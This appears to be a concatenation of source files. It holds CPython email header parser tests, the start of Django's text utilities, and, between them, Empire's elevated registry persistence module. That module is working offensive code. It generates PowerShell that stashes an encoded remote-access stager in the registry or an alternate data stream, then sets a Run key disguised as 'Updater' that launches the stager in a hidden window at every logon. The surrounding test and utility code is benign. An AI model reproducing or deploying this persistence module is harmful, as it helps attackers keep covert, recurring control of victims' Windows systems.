self.assertIsNone(mailbox_list.all_mailboxes[0].display_name)
self.assertEqual(mailbox_list.all_mailboxes[0].local_part,
'Roy A. Bear')
self.assertIsNone(mailbox_list.all_mailboxes[0].domain)
self.assertEqual(mailbox_list.all_mailboxes[0].addr_spec,
'"Roy A. Bear"')
self.assertIs(mailbox_list.all_mailboxes[1],
mailbox_list.mailboxes[0])
self.assertEqual(mailbox_list.mailboxes[0].addr_spec,
'dinsdale@test.example.com')
self.assertEqual(mailbox_list.mailboxes[0].display_name,
'Fred Flintstone')
def test_get_mailbox_list_junk_after_valid_address(self):
mailbox_list = self._test_get_x(parser.get_mailbox_list,
('"Roy A. Bear" <dinsdale@example.com>@@,'
' "Fred Flintstone" <dinsdale@test.example.com>'),
('"Roy A. Bear" <dinsdale@example.com>@@,'
' "Fred Flintstone" <dinsdale@test.example.com>'),
('"Roy A. Bear" <dinsdale@example.com>@@,'
' "Fred Flintstone" <dinsdale@test.example.com>'),
[errors.InvalidHeaderDefect],
'')
self.assertEqual(len(mailbox_list.mailboxes), 1)
self.assertEqual(len(mailbox_list.all_mailboxes), 2)
self.assertEqual(mailbox_list.all_mailboxes[0].addr_spec,
'dinsdale@example.com')
self.assertEqual(mailbox_list.all_mailboxes[0].display_name,
'Roy A. Bear')
self.assertEqual(mailbox_list.all_mailboxes[0].token_type,
'invalid-mailbox')
self.assertIs(mailbox_list.all_mailboxes[1],
mailbox_list.mailboxes[0])
self.assertEqual(mailbox_list.mailboxes[0].addr_spec,
'dinsdale@test.example.com')
self.assertEqual(mailbox_list.mailboxes[0].display_name,
'Fred Flintstone')
def test_get_mailbox_list_empty_list_element(self):
mailbox_list = self._test_get_x(parser.get_mailbox_list,
('"Roy A. Bear" <dinsdale@example.com>, (bird),,'
' "Fred Flintstone" <dinsdale@test.example.com>'),
('"Roy A. Bear" <dinsdale@example.com>, (bird),,'
' "Fred Flintstone" <dinsdale@test.example.com>'),
('"Roy A. Bear" <dinsdale@example.com>, ,,'
' "Fred Flintstone" <dinsdale@test.example.com>'),
[errors.ObsoleteHeaderDefect]*2,
'')
self.assertEqual(len(mailbox_list.mailboxes), 2)
self.assertEqual(mailbox_list.all_mailboxes,
mailbox_list.mailboxes)
self.assertEqual(mailbox_list.all_mailboxes[0].addr_spec,
'dinsdale@example.com')
self.assertEqual(mailbox_list.all_mailboxes[0].display_name,
'Roy A. Bear')
self.assertEqual(mailbox_list.mailboxes[1].addr_spec,
'dinsdale@test.example.com')
self.assertEqual(mailbox_list.mailboxes[1].display_name,
'Fred Flintstone')
def test_get_mailbox_list_only_empty_elements(self):
mailbox_list = self._test_get_x(parser.get_mailbox_list,
'(foo),, (bar)',
'(foo),, (bar)',
' ,, ',
[errors.ObsoleteHeaderDefect]*3,
'')
self.assertEqual(len(mailbox_list.mailboxes), 0)
self.assertEqual(mailbox_list.all_mailboxes,
mailbox_list.mailboxes)
# get_group_list
def test_get_group_list_cfws_only(self):
group_list = self._test_get_x(parser.get_group_list,
'(hidden);',
'(hidden)',
' ',
[],
';')
self.assertEqual(group_list.token_type, 'group-list')
self.assertEqual(len(group_list.mailboxes), 0)
self.assertEqual(group_list.mailboxes,
group_list.all_mailboxes)
def test_get_group_list_mailbox_list(self):
group_list = self._test_get_x(parser.get_group_list,
'dinsdale@example.org, "Fred A. Bear" <dinsdale@example.org>',
'dinsdale@example.org, "Fred A. Bear" <dinsdale@example.org>',
'dinsdale@example.org, "Fred A. Bear" <dinsdale@example.org>',
[],
'')
self.assertEqual(group_list.token_type, 'group-list')
self.assertEqual(len(group_list.mailboxes), 2)
self.assertEqual(group_list.mailboxes,
group_list.all_mailboxes)
self.assertEqual(group_list.mailboxes[1].display_name,
'Fred A. Bear')
def test_get_group_list_obs_group_list(self):
group_list = self._test_get_x(parser.get_group_list,
', (foo),,(bar)',
', (foo),,(bar)',
', ,, ',
[errors.ObsoleteHeaderDefect],
'')
self.assertEqual(group_list.token_type, 'group-list')
self.assertEqual(len(group_list.mailboxes), 0)
self.assertEqual(group_list.mailboxes,
group_list.all_mailboxes)
def test_get_group_list_comment_only_invalid(self):
group_list = self._test_get_x(parser.get_group_list,
'(bar)',
'(bar)',
' ',
[errors.InvalidHeaderDefect],
'')
self.assertEqual(group_list.token_type, 'group-list')
self.assertEqual(len(group_list.mailboxes), 0)
self.assertEqual(group_list.mailboxes,
group_list.all_mailboxes)
# get_group
def test_get_group_empty(self):
group = self._test_get_x(parser.get_group,
'Monty Python:;',
'Monty Python:;',
'Monty Python:;',
[],
'')
self.assertEqual(group.token_type, 'group')
self.assertEqual(group.display_name, 'Monty Python')
self.assertEqual(len(group.mailboxes), 0)
self.assertEqual(group.mailboxes,
group.all_mailboxes)
def test_get_group_null_addr_spec(self):
group = self._test_get_x(parser.get_group,
'foo: <>;',
'foo: <>;',
'foo: <>;',
[errors.InvalidHeaderDefect],
'')
self.assertEqual(group.display_name, 'foo')
self.assertEqual(len(group.mailboxes), 0)
self.assertEqual(len(group.all_mailboxes), 1)
self.assertEqual(group.all_mailboxes[0].value, '<>')
def test_get_group_cfws_only(self):
group = self._test_get_x(parser.get_group,
'Monty Python: (hidden);',
'Monty Python: (hidden);',
'Monty Python: ;',
[],
'')
self.assertEqual(group.token_type, 'group')
self.assertEqual(group.display_name, 'Monty Python')
self.assertEqual(len(group.mailboxes), 0)
self.assertEqual(group.mailboxes,
group.all_mailboxes)
def test_get_group_single_mailbox(self):
group = self._test_get_x(parser.get_group,
'Monty Python: "Fred A. Bear" <dinsdale@example.com>;',
'Monty Python: "Fred A. Bear" <dinsdale@example.com>;',
'Monty Python: "Fred A. Bear" <dinsdale@example.com>;',
[],
'')
self.assertEqual(group.token_type, 'group')
self.assertEqual(group.display_name, 'Monty Python')
self.assertEqual(len(group.mailboxes), 1)
self.assertEqual(group.mailboxes,
group.all_mailboxes)
self.assertEqual(group.mailboxes[0].addr_spec,
'dinsdale@example.com')
def test_get_group_mixed_list(self):
group = self._test_get_x(parser.get_group,
('Monty Python: "Fred A. Bear" <dinsdale@example.com>,'
'(foo) Roger <ping@exampele.com>, x@test.example.com;'),
('Monty Python: "Fred A. Bear" <dinsdale@example.com>,'
'(foo) Roger <ping@exampele.com>, x@test.example.com;'),
('Monty Python: "Fred A. Bear" <dinsdale@example.com>,'
' Roger <ping@exampele.com>, x@test.example.com;'),
[],
'')
self.assertEqual(group.token_type, 'group')
self.assertEqual(group.display_name, 'Monty Python')
self.assertEqual(len(group.mailboxes), 3)
self.assertEqual(group.mailboxes,
group.all_mailboxes)
self.assertEqual(group.mailboxes[0].display_name,
'Fred A. Bear')
self.assertEqual(group.mailboxes[1].display_name,
'Roger')
self.assertEqual(group.mailboxes[2].local_part, 'x')
def test_get_group_one_invalid(self):
group = self._test_get_x(parser.get_group,
('Monty Python: "Fred A. Bear" <dinsdale@example.com>,'
'(foo) Roger ping@exampele.com, x@test.example.com;'),
('Monty Python: "Fred A. Bear" <dinsdale@example.com>,'
'(foo) Roger ping@exampele.com, x@test.example.com;'),
('Monty Python: "Fred A. Bear" <dinsdale@example.com>,'
' Roger ping@exampele.com, x@test.example.com;'),
[errors.InvalidHeaderDefect, # non-angle addr makes local part invalid
errors.InvalidHeaderDefect], # and it's not obs-local either: no dots.
'')
self.assertEqual(group.token_type, 'group')
self.assertEqual(group.display_name, 'Monty Python')
self.assertEqual(len(group.mailboxes), 2)
self.assertEqual(len(group.all_mailboxes), 3)
self.assertEqual(group.mailboxes[0].display_name,
'Fred A. Bear')
self.assertEqual(group.mailboxes[1].local_part, 'x')
self.assertIsNone(group.all_mailboxes[1].display_name)
# get_address
def test_get_address_simple(self):
address = self._test_get_x(parser.get_address,
'dinsdale@example.com',
'dinsdale@example.com',
'dinsdale@example.com',
[],
'')
self.assertEqual(address.token_type, 'address')
self.assertEqual(len(address.mailboxes), 1)
self.assertEqual(address.mailboxes,
address.all_mailboxes)
self.assertEqual(address.mailboxes[0].domain,
'example.com')
self.assertEqual(address[0].token_type,
'mailbox')
def test_get_address_complex(self):
address = self._test_get_x(parser.get_address,
'(foo) "Fred A. Bear" <(bird)dinsdale@example.com>',
'(foo) "Fred A. Bear" <(bird)dinsdale@example.com>',
' "Fred A. Bear" < dinsdale@example.com>',
[],
'')
self.assertEqual(address.token_type, 'address')
self.assertEqual(len(address.mailboxes), 1)
self.assertEqual(address.mailboxes,
address.all_mailboxes)
self.assertEqual(address.mailboxes[0].display_name,
'Fred A. Bear')
self.assertEqual(address[0].token_type,
'mailbox')
def test_get_address_rfc2047_display_name(self):
address = self._test_get_x(parser.get_address,
'=?utf-8?q?=C3=89ric?= <foo@example.com>',
'Éric <foo@example.com>',
'Éric <foo@example.com>',
[],
'')
self.assertEqual(address.token_type, 'address')
self.assertEqual(len(address.mailboxes), 1)
self.assertEqual(address.mailboxes,
address.all_mailboxes)
self.assertEqual(address.mailboxes[0].display_name,
'Éric')
self.assertEqual(address[0].token_type,
'mailbox')
def test_get_address_empty_group(self):
address = self._test_get_x(parser.get_address,
'Monty Python:;',
'Monty Python:;',
'Monty Python:;',
[],
'')
self.assertEqual(address.token_type, 'address')
self.assertEqual(len(address.mailboxes), 0)
self.assertEqual(address.mailboxes,
address.all_mailboxes)
self.assertEqual(address[0].token_type,
'group')
self.assertEqual(address[0].display_name,
'Monty Python')
def test_get_address_group(self):
address = self._test_get_x(parser.get_address,
'Monty Python: x@example.com, y@example.com;',
'Monty Python: x@example.com, y@example.com;',
'Monty Python: x@example.com, y@example.com;',
[],
'')
self.assertEqual(address.token_type, 'address')
self.assertEqual(len(address.mailboxes), 2)
self.assertEqual(address.mailboxes,
address.all_mailboxes)
self.assertEqual(address[0].token_type,
'group')
self.assertEqual(address[0].display_name,
'Monty Python')
self.assertEqual(address.mailboxes[0].local_part, 'x')
def test_get_address_quoted_local_part(self):
address = self._test_get_x(parser.get_address,
'"foo bar"@example.com',
'"foo bar"@example.com',
'"foo bar"@example.com',
[],
'')
self.assertEqual(address.token_type, 'address')
self.assertEqual(len(address.mailboxes), 1)
self.assertEqual(address.mailboxes,
address.all_mailboxes)
self.assertEqual(address.mailboxes[0].domain,
'example.com')
self.assertEqual(address.mailboxes[0].local_part,
'foo bar')
self.assertEqual(address[0].token_type, 'mailbox')
def test_get_address_ends_at_special(self):
address = self._test_get_x(parser.get_address,
'dinsdale@example.com, next',
'dinsdale@example.com',
'dinsdale@example.com',
[],
', next')
self.assertEqual(address.token_type, 'address')
self.assertEqual(len(address.mailboxes), 1)
self.assertEqual(address.mailboxes,
address.all_mailboxes)
self.assertEqual(address.mailboxes[0].domain,
'example.com')
self.assertEqual(address[0].token_type, 'mailbox')
def test_get_address_invalid_mailbox_invalid(self):
address = self._test_get_x(parser.get_address,
'ping example.com, next',
'ping example.com',
'ping example.com',
[errors.InvalidHeaderDefect, # addr-spec with no domain
errors.InvalidHeaderDefect, # invalid local-part
errors.InvalidHeaderDefect, # missing .s in local-part
],
', next')
self.assertEqual(address.token_type, 'address')
self.assertEqual(len(address.mailboxes), 0)
self.assertEqual(len(address.all_mailboxes), 1)
self.assertIsNone(address.all_mailboxes[0].domain)
self.assertEqual(address.all_mailboxes[0].local_part, 'ping example.com')
self.assertEqual(address[0].token_type, 'invalid-mailbox')
def test_get_address_quoted_strings_in_atom_list(self):
address = self._test_get_x(parser.get_address,
'""example" example"@example.com',
'""example" example"@example.com',
'example example@example.com',
[errors.InvalidHeaderDefect]*3,
'')
self.assertEqual(address.all_mailboxes[0].local_part, 'example example')
self.assertEqual(address.all_mailboxes[0].domain, 'example.com')
self.assertEqual(address.all_mailboxes[0].addr_spec, '"example example"@example.com')
# get_address_list
def test_get_address_list_mailboxes_simple(self):
address_list = self._test_get_x(parser.get_address_list,
'dinsdale@example.com',
'dinsdale@example.com',
'dinsdale@example.com',
[],
'')
self.assertEqual(address_list.token_type, 'address-list')
self.assertEqual(len(address_list.mailboxes), 1)
self.assertEqual(address_list.mailboxes,
address_list.all_mailboxes)
self.assertEqual([str(x) for x in address_list.mailboxes],
[str(x) for x in address_list.addresses])
self.assertEqual(address_list.mailboxes[0].domain, 'example.com')
self.assertEqual(address_list[0].token_type, 'address')
self.assertIsNone(address_list[0].display_name)
def test_get_address_list_mailboxes_two_simple(self):
address_list = self._test_get_x(parser.get_address_list,
'foo@example.com, "Fred A. Bar" <bar@example.com>',
'foo@example.com, "Fred A. Bar" <bar@example.com>',
'foo@example.com, "Fred A. Bar" <bar@example.com>',
[],
'')
self.assertEqual(address_list.token_type, 'address-list')
self.assertEqual(len(address_list.mailboxes), 2)
self.assertEqual(address_list.mailboxes,
address_list.all_mailboxes)
self.assertEqual([str(x) for x in address_list.mailboxes],
[str(x) for x in address_list.addresses])
self.assertEqual(address_list.mailboxes[0].local_part, 'foo')
self.assertEqual(address_list.mailboxes[1].display_name, "Fred A. Bar")
def test_get_address_list_mailboxes_complex(self):
address_list = self._test_get_x(parser.get_address_list,
('"Roy A. Bear" <dinsdale@example.com>, '
'(ping) Foo <x@example.com>,'
'Nobody Is. Special <y@(bird)example.(bad)com>'),
('"Roy A. Bear" <dinsdale@example.com>, '
'(ping) Foo <x@example.com>,'
'Nobody Is. Special <y@(bird)example.(bad)com>'),
('"Roy A. Bear" <dinsdale@example.com>, '
'Foo <x@example.com>,'
'"Nobody Is. Special" <y@example. com>'),
[errors.ObsoleteHeaderDefect, # period in Is.
errors.ObsoleteHeaderDefect], # cfws in domain
'')
self.assertEqual(address_list.token_type, 'address-list')
self.assertEqual(len(address_list.mailboxes), 3)
self.assertEqual(address_list.mailboxes,
address_list.all_mailboxes)
self.assertEqual([str(x) for x in address_list.mailboxes],
[str(x) for x in address_list.addresses])
self.assertEqual(address_list.mailboxes[0].domain, 'example.com')
self.assertEqual(address_list.mailboxes[0].token_type, 'mailbox')
self.assertEqual(address_list.addresses[0].token_type, 'address')
self.assertEqual(address_list.mailboxes[1].local_part, 'x')
self.assertEqual(address_list.mailboxes[2].display_name,
'Nobody Is. Special')
def test_get_address_list_mailboxes_invalid_addresses(self):
address_list = self._test_get_x(parser.get_address_list,
('"Roy A. Bear" <dinsdale@example.com>, '
'(ping) Foo x@example.com[],'
'Nobody Is. Special <(bird)example.(bad)com>'),
('"Roy A. Bear" <dinsdale@example.com>, '
'(ping) Foo x@example.com[],'
'Nobody Is. Special <(bird)example.(bad)com>'),
('"Roy A. Bear" <dinsdale@example.com>, '
'Foo x@example.com[],'
'"Nobody Is. Special" < example. com>'),
[errors.InvalidHeaderDefect, # invalid address in list
errors.InvalidHeaderDefect, # 'Foo x' local part invalid.
errors.InvalidHeaderDefect, # Missing . in 'Foo x' local part
errors.ObsoleteHeaderDefect, # period in 'Is.' disp-name phrase
errors.InvalidHeaderDefect, # no domain part in addr-spec
errors.ObsoleteHeaderDefect], # addr-spec has comment in it
'')
self.assertEqual(address_list.token_type, 'address-list')
self.assertEqual(len(address_list.mailboxes), 1)
self.assertEqual(len(address_list.all_mailboxes), 3)
self.assertEqual([str(x) for x in address_list.all_mailboxes],
[str(x) for x in address_list.addresses])
self.assertEqual(address_list.mailboxes[0].domain, 'example.com')
self.assertEqual(address_list.mailboxes[0].token_type, 'mailbox')
self.assertEqual(address_list.addresses[0].token_type, 'address')
self.assertEqual(address_list.addresses[1].token_type, 'address')
self.assertEqual(len(address_list.addresses[0].mailboxes), 1)
self.assertEqual(len(address_list.addresses[1].mailboxes), 0)
self.assertEqual(
address_list.addresses[1].all_mailboxes[0].local_part, 'Foo x')
self.assertEqual(
address_list.addresses[2].all_mailboxes[0].display_name,
"Nobody Is. Special")
def test_get_address_list_group_empty(self):
address_list = self._test_get_x(parser.get_address_list,
'Monty Python: ;',
'Monty Python: ;',
'Monty Python: ;',
[],
'')
self.assertEqual(address_list.token_type, 'address-list')
self.assertEqual(len(address_list.mailboxes), 0)
self.assertEqual(address_list.mailboxes,
address_list.all_mailboxes)
self.assertEqual(len(address_list.addresses), 1)
self.assertEqual(address_list.addresses[0].token_type, 'address')
self.assertEqual(address_list.addresses[0].display_name, 'Monty Python')
self.assertEqual(len(address_list.addresses[0].mailboxes), 0)
def test_get_address_list_group_simple(self):
address_list = self._test_get_x(parser.get_address_list,
'Monty Python: dinsdale@example.com;',
'Monty Python: dinsdale@example.com;',
'Monty Python: dinsdale@example.com;',
[],
'')
self.assertEqual(address_list.token_type, 'address-list')
self.assertEqual(len(address_list.mailboxes), 1)
self.assertEqual(address_list.mailboxes,
address_list.all_mailboxes)
self.assertEqual(address_list.mailboxes[0].domain, 'example.com')
self.assertEqual(address_list.addresses[0].display_name,
'Monty Python')
self.assertEqual(address_list.addresses[0].mailboxes[0].domain,
'example.com')
def test_get_address_list_group_and_mailboxes(self):
address_list = self._test_get_x(parser.get_address_list,
('Monty Python: dinsdale@example.com, "Fred" <flint@example.com>;, '
'Abe <x@example.com>, Bee <y@example.com>'),
('Monty Python: dinsdale@example.com, "Fred" <flint@example.com>;, '
'Abe <x@example.com>, Bee <y@example.com>'),
('Monty Python: dinsdale@example.com, "Fred" <flint@example.com>;, '
'Abe <x@example.com>, Bee <y@example.com>'),
[],
'')
self.assertEqual(address_list.token_type, 'address-list')
self.assertEqual(len(address_list.mailboxes), 4)
self.assertEqual(address_list.mailboxes,
address_list.all_mailboxes)
self.assertEqual(len(address_list.addresses), 3)
self.assertEqual(address_list.mailboxes[0].local_part, 'dinsdale')
self.assertEqual(address_list.addresses[0].display_name,
'Monty Python')
self.assertEqual(address_list.addresses[0].mailboxes[0].domain,
'example.com')
self.assertEqual(address_list.addresses[0].mailboxes[1].local_part,
'flint')
self.assertEqual(address_list.addresses[1].mailboxes[0].local_part,
'x')
self.assertEqual(address_list.addresses[2].mailboxes[0].local_part,
'y')
self.assertEqual(str(address_list.addresses[1]),
str(address_list.mailboxes[2]))
def test_invalid_content_disposition(self):
content_disp = self._test_parse_x(
parser.parse_content_disposition_header,
";attachment", "; attachment", ";attachment",
[errors.InvalidHeaderDefect]*2
)
def test_invalid_content_transfer_encoding(self):
cte = self._test_parse_x(
parser.parse_content_transfer_encoding_header,
";foo", ";foo", ";foo", [errors.InvalidHeaderDefect]*3
)
@parameterize
class Test_parse_mime_version(TestParserMixin, TestEmailBase):
def mime_version_as_value(self,
value,
tl_str,
tl_value,
major,
minor,
defects):
mime_version = self._test_parse_x(parser.parse_mime_version,
value, tl_str, tl_value, defects)
self.assertEqual(mime_version.major, major)
self.assertEqual(mime_version.minor, minor)
mime_version_params = {
'rfc_2045_1': (
'1.0',
'1.0',
'1.0',
1,
0,
[]),
'RFC_2045_2': (
'1.0 (produced by MetaSend Vx.x)',
'1.0 (produced by MetaSend Vx.x)',
'1.0 ',
1,
0,
[]),
'RFC_2045_3': (
'(produced by MetaSend Vx.x) 1.0',
'(produced by MetaSend Vx.x) 1.0',
' 1.0',
1,
0,
[]),
'RFC_2045_4': (
'1.(produced by MetaSend Vx.x)0',
'1.(produced by MetaSend Vx.x)0',
'1. 0',
1,
0,
[]),
'empty': (
'',
'',
'',
None,
None,
[errors.HeaderMissingRequiredValue]),
}
class TestFolding(TestEmailBase):
policy = policy.default
def _test(self, tl, folded, policy=policy):
self.assertEqual(tl.fold(policy=policy), folded, tl.ppstr())
def test_simple_unstructured_no_folds(self):
self._test(parser.get_unstructured("This is a test"),
"This is a test\n")
def test_simple_unstructured_folded(self):
self._test(parser.get_unstructured("This is also a test, but this "
"time there are enough words (and even some "
"symbols) to make it wrap; at least in theory."),
"This is also a test, but this time there are enough "
"words (and even some\n"
" symbols) to make it wrap; at least in theory.\n")
def test_unstructured_with_unicode_no_folds(self):
self._test(parser.get_unstructured("hübsch kleiner beißt"),
"=?utf-8?q?h=C3=BCbsch_kleiner_bei=C3=9Ft?=\n")
def test_one_ew_on_each_of_two_wrapped_lines(self):
self._test(parser.get_unstructured("Mein kleiner Kaktus ist sehr "
"hübsch. Es hat viele Stacheln "
"und oft beißt mich."),
"Mein kleiner Kaktus ist sehr =?utf-8?q?h=C3=BCbsch=2E?= "
"Es hat viele Stacheln\n"
" und oft =?utf-8?q?bei=C3=9Ft?= mich.\n")
def test_ews_combined_before_wrap(self):
self._test(parser.get_unstructured("Mein Kaktus ist hübsch. "
"Es beißt mich. "
"And that's all I'm sayin."),
"Mein Kaktus ist =?utf-8?q?h=C3=BCbsch=2E__Es_bei=C3=9Ft?= "
"mich. And that's\n"
" all I'm sayin.\n")
# XXX Need test of an encoded word so long that it needs to be wrapped
def test_simple_address(self):
self._test(parser.get_address_list("abc <xyz@example.com>")[0],
"abc <xyz@example.com>\n")
def test_address_list_folding_at_commas(self):
self._test(parser.get_address_list('abc <xyz@example.com>, '
'"Fred Blunt" <sharp@example.com>, '
'"J.P.Cool" <hot@example.com>, '
'"K<>y" <key@example.com>, '
'Firesale <cheap@example.com>, '
'<end@example.com>')[0],
'abc <xyz@example.com>, "Fred Blunt" <sharp@example.com>,\n'
' "J.P.Cool" <hot@example.com>, "K<>y" <key@example.com>,\n'
' Firesale <cheap@example.com>, <end@example.com>\n')
def test_address_list_with_unicode_names(self):
self._test(parser.get_address_list(
'Hübsch Kaktus <beautiful@example.com>, '
'beißt beißt <biter@example.com>')[0],
'=?utf-8?q?H=C3=BCbsch?= Kaktus <beautiful@example.com>,\n'
' =?utf-8?q?bei=C3=9Ft_bei=C3=9Ft?= <biter@example.com>\n')
def test_address_list_with_unicode_names_in_quotes(self):
self._test(parser.get_address_list(
'"Hübsch Kaktus" <beautiful@example.com>, '
'"beißt" beißt <biter@example.com>')[0],
'=?utf-8?q?H=C3=BCbsch?= Kaktus <beautiful@example.com>,\n'
' =?utf-8?q?bei=C3=9Ft_bei=C3=9Ft?= <biter@example.com>\n')
# XXX Need tests with comments on various sides of a unicode token,
# and with unicode tokens in the comments. Spaces inside the quotes
# currently don't do the right thing.
def test_initial_whitespace_splitting(self):
body = parser.get_unstructured(' ' + 'x'*77)
header = parser.Header([
parser.HeaderLabel([parser.ValueTerminal('test:', 'atext')]),
parser.CFWSList([parser.WhiteSpaceTerminal(' ', 'fws')]), body])
self._test(header, 'test: \n ' + 'x'*77 + '\n')
def test_whitespace_splitting(self):
self._test(parser.get_unstructured('xxx ' + 'y'*77),
'xxx \n ' + 'y'*77 + '\n')
if __name__ == '__main__':
unittest.main()
|
pyq881120/Empire
|
refs/heads/master
|
lib/modules/persistence/elevated/registry.py
|
13
|
import os
from lib.common import helpers
class Module:
def __init__(self, mainMenu, params=[]):
self.info = {
'Name': 'Invoke-Registry',
'Author': ['@mattifestation', '@harmj0y'],
'Description': ('Persist a stager (or script) via the HKLM:SOFTWARE\Microsoft\Windows\CurrentVersion\Run '
'registry key. This has an easy detection/removal rating.'),
'Background' : False,
'OutputExtension' : None,
'NeedsAdmin' : True,
'OpsecSafe' : False,
'MinPSVersion' : '2',
'Comments': [
'https://github.com/mattifestation/PowerSploit/blob/master/Persistence/Persistence.psm1'
]
}
# any options needed by the module, settable during runtime
self.options = {
# format:
# value_name : {description, required, default_value}
'Agent' : {
'Description' : 'Agent to run module on.',
'Required' : True,
'Value' : ''
},
'Listener' : {
'Description' : 'Listener to use.',
'Required' : False,
'Value' : ''
},
'KeyName' : {
'Description' : 'Key name for the run trigger.',
'Required' : True,
'Value' : 'Updater'
},
'RegPath' : {
'Description' : 'Registry location to store the script code. Last element is the key name.',
'Required' : False,
'Value' : 'HKLM:SOFTWARE\Microsoft\Windows\CurrentVersion\Debug'
},
'ADSPath' : {
'Description' : 'Alternate-data-stream location to store the script code.',
'Required' : False,
'Value' : ''
},
'ExtFile' : {
'Description' : 'Use an external file for the payload instead of a stager.',
'Required' : False,
'Value' : ''
},
'Cleanup' : {
'Description' : 'Switch. Clean up the trigger and any script from the specified location.',
'Required' : False,
'Value' : ''
},
'UserAgent' : {
'Description' : 'User-agent string to use for the staging request (default, none, or other).',
'Required' : False,
'Value' : 'default'
},
'Proxy' : {
'Description' : 'Proxy to use for request (default, none, or other).',
'Required' : False,
'Value' : 'default'
},
'ProxyCreds' : {
'Description' : 'Proxy credentials ([domain\]username:password) to use for request (default, none, or other).',
'Required' : False,
'Value' : 'default'
}
}
# save off a copy of the mainMenu object to access external functionality
# like listeners/agent handlers/etc.
self.mainMenu = mainMenu
for param in params:
# parameter format is [Name, Value]
option, value = param
if option in self.options:
self.options[option]['Value'] = value
def generate(self):
listenerName = self.options['Listener']['Value']
# trigger options
keyName = self.options['KeyName']['Value']
# storage options
regPath = self.options['RegPath']['Value']
adsPath = self.options['ADSPath']['Value']
# management options
extFile = self.options['ExtFile']['Value']
cleanup = self.options['Cleanup']['Value']
# staging options
userAgent = self.options['UserAgent']['Value']
proxy = self.options['Proxy']['Value']
proxyCreds = self.options['ProxyCreds']['Value']
statusMsg = ""
locationString = ""
# for cleanup, remove any script from the specified storage location
# and remove the specified trigger
if cleanup.lower() == 'true':
if adsPath != '':
# remove the ADS storage location
if ".txt" not in adsPath:
print helpers.color("[!] For ADS, use the form C:\\users\\john\\AppData:blah.txt")
return ""
script = "Invoke-Command -ScriptBlock {cmd /C \"echo x > "+adsPath+"\"};"
else:
# remove the script stored in the registry at the specified reg path
path = "\\".join(regPath.split("\\")[0:-1])
name = regPath.split("\\")[-1]
script = "$RegPath = '"+regPath+"';"
script += "$parts = $RegPath.split('\\');"
script += "$path = $RegPath.split(\"\\\")[0..($parts.count -2)] -join '\\';"
script += "$name = $parts[-1];"
script += "$null=Remove-ItemProperty -Force -Path $path -Name $name;"
script += "Remove-ItemProperty -Force -Path HKLM:Software\\Microsoft\\Windows\\CurrentVersion\\Run\\ -Name "+keyName+";"
script += "'Registry persistence removed.'"
return script
if extFile != '':
# read in an external file as the payload and build a
# base64 encoded version as encScript
if os.path.exists(extFile):
f = open(extFile, 'r')
fileData = f.read()
f.close()
# unicode-base64 encode the script for -enc launching
encScript = helpers.enc_powershell(fileData)
statusMsg += "using external file " + extFile
else:
print helpers.color("[!] File does not exist: " + extFile)
return ""
else:
# if an external file isn't specified, use a listener
if not self.mainMenu.listeners.is_listener_valid(listenerName):
# not a valid listener, return nothing for the script
print helpers.color("[!] Invalid listener: " + listenerName)
return ""
else:
# generate the PowerShell one-liner with all of the proper options set
launcher = self.mainMenu.stagers.generate_launcher(listenerName, encode=True, userAgent=userAgent, proxy=proxy, proxyCreds=proxyCreds)
encScript = launcher.split(" ")[-1]
statusMsg += "using listener " + listenerName
# store the script in the specified alternate data stream location
if adsPath != '':
if ".txt" not in adsPath:
print helpers.color("[!] For ADS, use the form C:\\users\\john\\AppData:blah.txt")
return ""
script = "Invoke-Command -ScriptBlock {cmd /C \"echo "+encScript+" > "+adsPath+"\"};"
locationString = "$(cmd /c \''more < "+adsPath+"\'')"
else:
# otherwise store the script into the specified registry location
path = "\\".join(regPath.split("\\")[0:-1])
name = regPath.split("\\")[-1]
statusMsg += " stored in " + regPath + "."
script = "$RegPath = '"+regPath+"';"
script += "$parts = $RegPath.split('\\');"
script += "$path = $RegPath.split(\"\\\")[0..($parts.count -2)] -join '\\';"
script += "$name = $parts[-1];"
script += "$null=Set-ItemProperty -Force -Path $path -Name $name -Value "+encScript+";"
# note where the script is stored
locationString = "$((gp "+path+" "+name+")."+name+")"
script += "$null=Set-ItemProperty -Force -Path HKLM:Software\\Microsoft\\Windows\\CurrentVersion\\Run\\ -Name "+keyName+" -Value '\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -c \"$x="+locationString+";powershell -Win Hidden -enc $x\"';"
script += "'Registry persistence established "+statusMsg+"'"
return script
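# Editor's note (illustrative, derived from the defaults above; not part of
# the original module): with KeyName 'Updater' and the default RegPath, the
# generated PowerShell stores the base64-encoded stager under
# HKLM:SOFTWARE\Microsoft\Windows\CurrentVersion\Debug and sets a trigger at
# HKLM:SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Updater whose value runs
# powershell.exe -c "$x=<stored blob>;powershell -Win Hidden -enc $x".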
|
ashishnitinpatil/django_appengine_project_template
|
refs/heads/master
|
django/utils/text.py
|
104
|
from __future__ import unicode_literals
import re
import unicodedata
from gzip import GzipFile
from io import BytesIO
from django.utils.encoding import force_text
from django.utils.functional import allow_lazy, SimpleLazyObject
from django.utils import six
from django.utils.six.moves import html_entities
from django.utils.translation import ugettext_lazy, ugettext as _, pgettext
from django.utils.safestring import mark_safe
if six.PY2:
# Import force_unicode even though this module doesn't use it, because some
# people rely on it being here.
from django.utils.encoding import force_unicode
# Capitalizes the first letter of a string.
capfirst = lambda x: x and force_text(x)[0].upper() + force_text(x)[1:]
capfirst = allow_lazy(capfirst, six.text_type)
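# Example (editor's sketch, not part of the original module):
# capfirst('hello world') -> 'Hello world'. The `x and ...` guard
# short-circuits, so falsy input such as '' is returned unchanged.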
# Set up regular expressions
re_words = re.compile(r'&.*?;|<.*?>|(\w[\w-]*)', re.U|re.S)
re_tag = re.compile(r'<(/)?([^ ]+?)(?:(\s*/)| .*?)?>', re.S)
def wrap(text, width):
"""
A word-wrap function that preserves existing line breaks and most spaces in
the text. Expects that existing line breaks are posix newlines.
"""
text = force_text(text)
def _generator():
it = iter(text.split(' '))
word = next(it)
yield word
pos = len(word) - word.rfind('\n') - 1
for word in it:
if "\n" in word:
lines = word.split('\n')
else:
lines = (word,)
pos += len(lines[0]) + 1
if pos > width:
yield '\n'
pos = len(lines[-1])
else:
yield ' '
if len(lines) > 1:
pos = len(lines[-1])
yield word
return ''.join(_generator())
wrap = allow_lazy(wrap, six.text_type)
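# Illustrative example (editor's sketch, not part of the original module):
# a word that would overflow the width forces a break before it.
#
#   >>> wrap('one two three four', 10)
#   'one two\nthree four'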
class Truncator(SimpleLazyObject):
"""
An object used to truncate text, either by characters or words.
"""
def __init__(self, text):
super(Truncator, self).__init__(lambda: force_text(text))
def add_truncation_text(self, text, truncate=None):
